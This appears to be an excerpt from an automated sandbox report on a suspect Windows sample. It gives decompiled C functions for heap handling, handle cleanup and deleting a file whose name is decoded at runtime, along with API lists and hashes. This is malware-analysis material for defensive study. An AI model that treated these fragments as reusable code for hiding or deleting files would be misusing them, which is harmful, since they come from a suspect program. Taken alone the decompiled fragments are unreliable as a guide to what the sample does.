                      				goto L7;
                      			}








                      0x01388b34
                      0x01388b38
                      0x01388b3d
                      0x01388b45
                      0x01388b50
                      0x01388ba3
                      0x01388baa
                      0x01388baa
                      0x01388b53
                      0x01388b56
                      0x01388b5a
                      0x01388b6e
                      0x01388b82
                      0x01388b86
                      0x01388b8b
                      0x01388b8f
                      0x01388b95
                      0x01388b9d
                      0x01388b9f
                      0x01388b9f
                      0x01388ba1
                      0x00000000
                      0x01388ba1
                      0x01388b60
                      0x01388b68
                      0x01388b6c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01388b6c
                      0x00000000

                      APIs
                      • GetCurrentProcessId.KERNEL32(00000000,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B47
                      • GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B75
                      • RtlAllocateHeap.NTDLL(00000000,?,0138215D), ref: 01388B7C
                      • lstrcpyW.KERNEL32(00000004,?), ref: 01388B8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess$AllocateCurrentlstrcpy
                      • String ID:
                      • API String ID: 2952365268-0
                      • Opcode ID: 36d1b11617d216753d3ce42e007751fd661e134dc2ef8e05e8b4141dda052a29
                      • Instruction ID: 557b850b65c64b2c5caf77e19dfbfa9c782a1be3a260f4afa7c6b293c6cffc5d
                      • Opcode Fuzzy Hash: 36d1b11617d216753d3ce42e007751fd661e134dc2ef8e05e8b4141dda052a29
                      • Instruction Fuzzy Hash: A601B1716003049FDF219F69D884ACABBE8FF84744F648569FA45D7240D730E840CFA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E013884C0(intOrPtr __ecx, void* __edx, long* _a4) {
                      				intOrPtr _v8;
                      				void* _t5;
                      				void* _t11;
                      				long* _t16;
                      				void* _t17;
                      
                      				_t16 = _a4;
                      				_t11 = __edx;
                      				_v8 = __ecx;
                      				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
                      				_t17 = _t5;
                      				if(_t17 == 0) {
                      					return _t5;
                      				} else {
                      					if(E01382D80(_t17, _t16, _v8, _t11) == 0) {
                      						return _t17;
                      					}
                      					HeapFree(GetProcessHeap(), 0, _t17);
                      					return 0;
                      				}
                      			}

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,01388668,?,?,?,01388668,?), ref: 013884D5
                      • RtlAllocateHeap.NTDLL(00000000), ref: 013884DC
                        • Part of subcall function 01382D80: memset.NTDLL ref: 01382D94
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013884FF
                      • HeapFree.KERNEL32(00000000), ref: 01388506
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFreememset
                      • String ID:
                      • API String ID: 1319286391-0
                      • Opcode ID: 41d74cef7781a376ac20eb51a7fa340ba4a8a2b6d4b1c29dab490d58721fca78
                      • Instruction ID: f70dcd16a35e0d46331b2e5f6de1237c3c862c3f8fc361e2770168660edce1f0
                      • Opcode Fuzzy Hash: 41d74cef7781a376ac20eb51a7fa340ba4a8a2b6d4b1c29dab490d58721fca78
                      • Instruction Fuzzy Hash: 06F09636B003146BEA106BAD7C4969EFB9CDF44667F140062FE08D2204E5319D1087F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E01381970() {
                      				void* _v8;
                      				short _v528;
                      				void* _t15;
                      
                      				E01381830(0x1381010, 0x14, 0x41ce18c7,  &_v8);
                      				_t15 = _v8;
                      				 *0x138c200( &_v528, 0x104, _t15, 0x138c7c0, _t15);
                      				HeapFree(GetProcessHeap(), 0, _t15);
                      				return DeleteFileW( &_v528);
                      			}

                      APIs
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • _snwprintf.NTDLL ref: 013819A8
                      • GetProcessHeap.KERNEL32(00000000,01389730), ref: 013819B4
                      • HeapFree.KERNEL32(00000000), ref: 013819BB
                      • DeleteFileW.KERNEL32(?), ref: 013819C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
                      • String ID:
                      • API String ID: 135842935-0
                      • Opcode ID: 392a6d0cf0c035f642145efd5081708c2244e27d7c4cbd08d773cd2711f7cf6d
                      • Instruction ID: ee187af316a1c92c2fb1ec1252414d5cb5c8fd880b0bc270b0c51f694f491095
                      • Opcode Fuzzy Hash: 392a6d0cf0c035f642145efd5081708c2244e27d7c4cbd08d773cd2711f7cf6d
                      • Instruction Fuzzy Hash: 92F0A0B1901318BBEE20BBA4AC4DFCF7F6CEB05319F100091FA09E2146D6305A058BF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0138A750(long __ecx) {
                      				int _t3;
                      				long _t7;
                      				void* _t9;
                      				void* _t10;
                      
                      				_t10 =  *0x138cbd4; // 0x0
                      				_t7 = __ecx;
                      				_t9 = 0x138cbd4;
                      				while(_t10 != 0) {
                      					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
                      					if(_t3 == 0x102) {
                      						_t9 = _t10;
                      					} else {
                      						 *_t9 =  *_t10;
                      						CloseHandle( *(_t10 + 8));
                      						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
                      					}
                      					_t10 =  *_t9;
                      				}
                      				return _t3;
                      			}

                      APIs
                      • WaitForSingleObject.KERNEL32(?,?,00000000,01389315,00000000,0138928E), ref: 0138A768
                      • CloseHandle.KERNEL32(?,?,00000000,01389315,00000000,0138928E), ref: 0138A77C
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,01389315,00000000,0138928E), ref: 0138A785
                      • HeapFree.KERNEL32(00000000,?,00000000,01389315,00000000,0138928E), ref: 0138A78C
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CloseFreeHandleObjectProcessSingleWait
                      • String ID:
                      • API String ID: 1931067520-0
                      • Opcode ID: 61c92bca60be036a21e70525fa651baca76577334cd5f1d372bc261b3a52b03e
                      • Instruction ID: 92909dbac3745b2ee3866fd91f95dd591cb7cabfe165b10ea72e706f6bc62a6f
                      • Opcode Fuzzy Hash: 61c92bca60be036a21e70525fa651baca76577334cd5f1d372bc261b3a52b03e
                      • Instruction Fuzzy Hash: 4FF0E536500320AFEB323B98E888AAA7BBDEF44725F180416FA42D3210C3749C40DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%